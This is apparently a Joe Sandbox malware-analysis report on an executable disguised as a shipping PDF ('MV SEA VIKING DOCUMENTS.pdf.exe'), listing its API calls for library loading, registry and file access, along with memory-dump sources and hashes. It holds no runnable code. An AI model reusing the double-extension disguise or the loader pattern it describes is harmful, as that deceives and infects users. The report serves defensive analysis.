                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 1892508949-670666241
                                                                                                                                                                                                                                • Opcode ID: ab4ebdb945303dd5035fc9fb5ceb890aaaa1f9d13af24d58e5a8eb96f5c40a35
                                                                                                                                                                                                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab4ebdb945303dd5035fc9fb5ceb890aaaa1f9d13af24d58e5a8eb96f5c40a35
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                                                                                                • Opcode ID: 47559a36ebc19421b636ffb62e163a3a93afacd14370c430438519e5d946d215
                                                                                                                                                                                                                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47559a36ebc19421b636ffb62e163a3a93afacd14370c430438519e5d946d215
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                                                                                • Opcode ID: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245A941 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: ;!#'
                                                                                                                                                                                                                                • API String ID: 1029625771-608325217
                                                                                                                                                                                                                                • Opcode ID: 1eecd1c317b26a0cd13ea2e9ec85de77255aa5d664e5be2309b90e1679215caf
                                                                                                                                                                                                                                • Instruction ID: 6d7f8523082e9c11b6c32dc6690a2c74b66484210d1fc92b725c27132d4f958e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eecd1c317b26a0cd13ea2e9ec85de77255aa5d664e5be2309b90e1679215caf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C5142D25C43DA66C7119AA8584EFAB7EF95E87D98F5802CFEC806B147C3171142D730
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245E672 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: `
                                                                                                                                                                                                                                • API String ID: 1029625771-1850852036
                                                                                                                                                                                                                                • Opcode ID: 9097eeca33774e1b6c9ee8fa9843052d3f46fd89d15ba33b3fd187016d431124
                                                                                                                                                                                                                                • Instruction ID: ab5051985e9f8f643c321c5e7df0b8ce61ebd582a321ca75e1040dce7b81a39f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9097eeca33774e1b6c9ee8fa9843052d3f46fd89d15ba33b3fd187016d431124
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D514871A00369DFEF349E6989657DB37B2AF15760F84412FDC8ADB306D33086468B02
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                                • Opcode ID: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                                                                • Opcode ID: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86975ae7e55868c6fa7f0a653ee38b5bdebf79f927548a24dbd204ed482989db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

